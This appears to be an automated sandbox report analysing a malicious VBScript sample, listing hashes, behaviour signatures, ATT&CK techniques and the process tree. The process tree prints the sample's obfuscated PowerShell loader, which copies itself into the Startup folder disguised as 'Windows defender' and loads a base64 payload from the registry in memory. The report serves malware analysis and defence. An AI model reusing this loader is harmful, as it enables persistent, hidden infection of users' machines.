Analysis

  • max time kernel
    29s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    08-07-2024 19:32

General

  • Target

    9c173fbe1731dce2731ff72991b1b2220448418434162fe1b810cd0e01d3d016.vbs

  • Size

    105KB

  • MD5

    2502518aa797758d68760e5c46f4fd85

  • SHA1

    27f0b73cea1441a772d9635e4f95441ec754549c

  • SHA256

    9c173fbe1731dce2731ff72991b1b2220448418434162fe1b810cd0e01d3d016

  • SHA512

    59ac66961c7a9945d2c3d062662a8e3fe2161d6498a994404261432f62d0af9df35d94900e302da6cfaa5daf8eb1130a83be88fa4c9f874073519341b84cfbae

  • SSDEEP

    1536:BF67GmLWRSsyLZ6Tt1fk9umda0otZHe7GcAthbTmtDFsyCV1XqFv6Z9Ho4TUYj+R:z677LKvfzftUaHvHQwh6IeyRu

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9c173fbe1731dce2731ff72991b1b2220448418434162fe1b810cd0e01d3d016.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\9c173fbe1731dce2731ff72991b1b2220448418434162fe1b810cd0e01d3d016.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows defender.vbs'; $disagreements = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $disagreements = -join $disagreements[-1..-$disagreements.Length];[<##>AppDomain<##>]::<##>('compositionurrentDomain'.replace('composition','C'))<##>.<##>('Switzerlandoad'.replace('Switzerland','L'))([Convert]::FromBase64String($disagreements))<##>.<##>('taeniacidentryPoint'.replace('taeniacide','E'))<##>.<##>('Inlumpyoke'.replace('lumpy','v'))($Null,$Null)<##>;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2452

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2452-4-0x000007FEF507E000-0x000007FEF507F000-memory.dmp
    Filesize

    4KB

  • memory/2452-8-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp
    Filesize

    9.6MB

  • memory/2452-7-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp
    Filesize

    9.6MB

  • memory/2452-6-0x0000000002790000-0x0000000002798000-memory.dmp
    Filesize

    32KB

  • memory/2452-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp
    Filesize

    2.9MB

  • memory/2452-11-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp
    Filesize

    9.6MB

  • memory/2452-10-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp
    Filesize

    9.6MB

  • memory/2452-9-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp
    Filesize

    9.6MB

  • memory/2452-12-0x000007FEF4DC0000-0x000007FEF575D000-memory.dmp
    Filesize

    9.6MB

  • memory/2452-13-0x000007FEF507E000-0x000007FEF507F000-memory.dmp
    Filesize

    4KB